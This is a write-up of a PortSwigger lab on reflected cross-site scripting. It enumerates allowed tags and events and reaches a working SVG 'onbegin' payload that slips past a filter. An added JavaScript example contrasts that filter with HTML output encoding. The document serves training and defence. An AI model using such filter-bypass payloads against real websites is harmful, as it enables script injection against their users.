PortSwigger: Reflected XSS with some SVG markup allowed
Solution
Open the website: https://0a9800a703938046cd7eb93700b3000e.h1-web-security-academy.net/
Payload: <script>alert(1)</script>
---
https://0a9800a703938046cd7eb93700b3000e.h1-web-security-academy.net/?search=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
Tags wordlist from --> https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
---
┌──(kali㉿kali)-[~/Desktop/writeups/PortSwigger/Port_Swigger_Reflected XSS with some SVG markup allowed]
└─$ head -n2 tags.txt
a
a2
---
Allowed tags:
image
svg
title
Checking which events are acceptable
Events wordlist from --> https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
---
┌──(kali㉿kali)-[~/Desktop/writeups/PortSwigger/Port_Swigger_Reflected XSS with some SVG markup allowed]
└─$ head -n2 events.txt
onafterscriptexecute
onanimationcancel
---
Allowed events:
onbegin
Payload: <svg><animatetransform onbegin=alert(1)>
https://0af0008804b0e733800b03a000be00ec.h1-web-security-academy.net/?search=%3Csvg%3E%3Canimatetransform+onbegin%3Dalert%281%29%3E
Solved
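
Why the filter fails and what fixes it, as an added example that is not part of the original write-up or the lab's code: a constructed model of a tag/event filter next to context-aware output encoding, run over the two payloads above. The allow-lists, function names and the result-page markup are assumptions; animatetransform is listed because the final payload using it was reflected.

```javascript
// Added example: a constructed model of a tag/event filter, not the lab's real code.
// Allow-lists mirror what the write-up observed; animatetransform is assumed
// allowed because the final payload that uses it was reflected.
const ALLOWED_TAGS = new Set(["svg", "image", "title", "animatetransform"]);
const ALLOWED_EVENTS = new Set(["onbegin"]);

// Weak approach: inspect the input, reject unlisted names, reflect the rest raw.
function weakFilter(input) {
  const tags = [...input.matchAll(/<\s*\/?\s*([a-z][a-z0-9]*)/gi)].map(m => m[1].toLowerCase());
  const events = [...input.matchAll(/\s(on[a-z]+)\s*=/gi)].map(m => m[1].toLowerCase());
  const badTag = tags.find(t => !ALLOWED_TAGS.has(t));
  if (badTag) return { blocked: true, reason: `Tag is not allowed: ${badTag}` };
  const badEvent = events.find(e => !ALLOWED_EVENTS.has(e));
  if (badEvent) return { blocked: true, reason: `Event is not allowed: ${badEvent}` };
  // Hypothetical result-page markup: the input lands in an HTML text context unencoded.
  return { blocked: false, html: `<h1>Search results for '${input}'</h1>` };
}

// Hardened approach: do not decide which markup is "safe"; encode for the HTML
// text context so the browser cannot parse the input as elements or attributes.
function escapeHtml(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(input).replace(/[&<>"']/g, c => map[c]);
}

function hardenedRender(input) {
  return `<h1>Search results for '${escapeHtml(input)}'</h1>`;
}

// The two payloads from the write-up.
const PAYLOADS = ["<script>alert(1)</script>", "<svg><animatetransform onbegin=alert(1)>"];

for (const p of PAYLOADS) {
  const weak = weakFilter(p);
  console.log("weak    :", weak.blocked ? weak.reason : weak.html);
  console.log("hardened:", hardenedRender(p));
}
```

The modelled filter rejects the first payload but reflects the second unchanged, while the encoded output renders both as inert text.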